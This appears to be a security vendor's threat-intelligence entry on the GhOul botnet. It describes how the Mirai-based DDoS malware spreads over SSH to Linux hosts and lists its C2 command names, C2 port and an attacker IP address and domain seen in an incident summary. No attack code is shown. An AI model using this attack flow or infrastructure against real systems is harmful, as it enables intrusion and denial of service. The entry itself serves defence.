Botnet Encyclopedia

A Knowledge Base of Attack Campaigns captured by Guardicore Global Sensor Network

Campaign Information

Name

GhOul
active

First seen in Guardicore Centra

2020-06-11

Last seen in Guardicore Centra

2020-10-27

GhOul is a DDoS campaign seen in Guardicore’s sensors since June. However, it was observed even earlier, around February. GhOul spreads over SSH in order to infect Linux-based machines with DDoS malware. The malware is Mirai-based, compiled for various architectures and is similar to Helios and Hakai variants (see links below). Its list of C2 commands includes: “TCP, SYN, ACK, XMAS, STOMP, UDPREG, UDPHEX, UDPRAW, HTTPSTOPM, HTTP, VSE, STD, OVH, STOP, KILL”, all seem to be DDoS over various protocols using different payload formats. Most attacks captured by Guardicore’s sensors have originated from machines belonging to OVH, France. The command-and-control servers – 8 seen during the campaign’s active period – are machines based in Germany, France and Iran. The C2 communication is performed over port 3333, as is necessary for receiving the list of DDoS targets.

Customized Firewall Rules for Your Attack Surface

Deploy our threat intelligence sensors in your organization’s data center
and get rules tailored to the attacks that have tried to compromise your specific environment.

Attack Flow

Breached Services

SSH

Tags

Successful SSH Login

1 Shell Commands

Download Operation

Access Suspicious Domain

Outgoing Connection

SSH

Incident Summary

A user logged in using SSH with the following credentials: root / **** – Authentication policy: White List

Successful SSH Login

A possibly malicious Download Operation was detected 2 times

Download Operation

Process /bin/bash generated outgoing network traffic to: 51.178.225.200:80

Outgoing Connection

Process /bin/bash attempted to access suspicious domains: ip-51-178-225.eu

Outgoing Connection

Access Suspicious Domain

Connection was closed due to user inactivity